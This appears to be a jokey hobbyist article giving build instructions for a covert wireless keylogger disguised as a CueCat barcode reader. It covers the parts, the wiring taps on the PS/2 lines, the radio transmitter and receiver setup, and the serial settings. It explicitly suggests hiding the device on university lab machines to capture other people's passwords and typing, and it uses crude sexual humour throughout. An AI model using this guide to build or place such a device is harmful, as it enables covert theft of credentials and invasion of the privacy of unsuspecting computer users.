Many people seem to enjoy hacking cuecats. But what about hacking USING cuecats? Afroman finally got off his ass and wrote up an article on
Wireless keyboard sniffing with the help of cuecats
Certain requirements must be met if you want to want to cheaply build something that can wirelessly transmit someone's keystrokes. The device would have to plug into the ps2 port of a machine, in parallel with the keyboard. Such a device would have to look as unsuspicious as possible and be as cool as Arnold in Twins. Something that looks like it was meant to be plugged in with the keyboard all along.. hmm.. a cuecat!
This mod could be used to sniff passwords in your university's computer clusters, but its most important purpose is to finally find a use for these fucking pieces of junk.
Parts
TXM-433-LC
or TXM-433-LR
and the matching RXM-433-LC/LR receiver. You can get them at Digikey
for about $21 total.
A 10Mhz
crystal. Rip one out of an old motherboard or something.
MAX233 free
sampled from Maxim. (Not the magazine,
but still pretty sexy)
PIC16F84A
free sampled from the very generous
Microchip. I used the PIC16F84A-04/P
version.
Female D-sub 9 connector
A
PIC programmer
Some resistors
Crack
A cuecat
Transmitter
This diagram shows the connection points you will need to make on the cuecat.
Tapping the +5v and ground will power the microcontroller and the transmitter,
while the clock and data lines will contain the encoded data of the keypresses.
Do not sever any of the cuecat's wires here! Just make connections to the underside
of the connector, or the exposed bits of metal you can see on the wires.
Program the PIC using this hex file before you make
any of the above connections. The Linx datasheet says you should connect each
and every one of the pins marked GND to ground, so you had better listen to
them or they might eat your parents. None of the resistor values in this diagram
are critical, anything from 1k to 20k should be fine. For a ghetto half-wave
monopole antenna, just cut 33cm of wire and solder it to pin 5 of the transmitter
chip. It doesn't matter which way around you connect the 10Mhz crystal, just
like it doesn't matter if you're black or white HIIII Hiiiiii.
Receiver
The receiver half needs 5v to operate, which you can
take from your PC's power supply, or create using a 9v battery and a 7805.
Use the same style antenna you did for the transmitter. Only two wires go to
the serial connector: ground, and the output from the max233. The diagram depicts
the connections you make when viewing the soldering side of the 9pin
connector. Connect the receiver to a serial port on your machine, and pop open
hyperterminal and/or a boner. Set it to 2400bps, 8 data bits, no parity, 1 stop
bit, no flow control. Plug the cuecat into a nearby pc that you want to h4x
and you should now be able to see what people are typing/wanking to.
How it verks
The PIC intercepts the keystrokes according to the PS/2
protocol. These are sent as weird
shit, like 0x1C for 'a', so the PIC decodes them to their corresponding
ascii value, then spits the ascii character out to the asynchronous transmitter.
Then the receiver receives the signals, and farts out a datastream. This is
in the form of 0 to 5v pulses, which your PC's serial port can't understand.
The max233 converts the 0 to 5v signal into a +/-10v signal so the serial port
is happy. These go to pin 2 on the connector, which is the receive data pin
for the serial port.
The source code is here
Here's my cuecat transmitter, with the antenna popping an orange boner. With
it curled up inside and the cover on, it looks indistinguishable from a normal
cuecat, and the led still works too.
Irrelevant benchmarks
Number of friends before: 0
Number of friends after: 1 (a restraining order)
Amount of fur before: 6 CFM
After: 4.2GHz
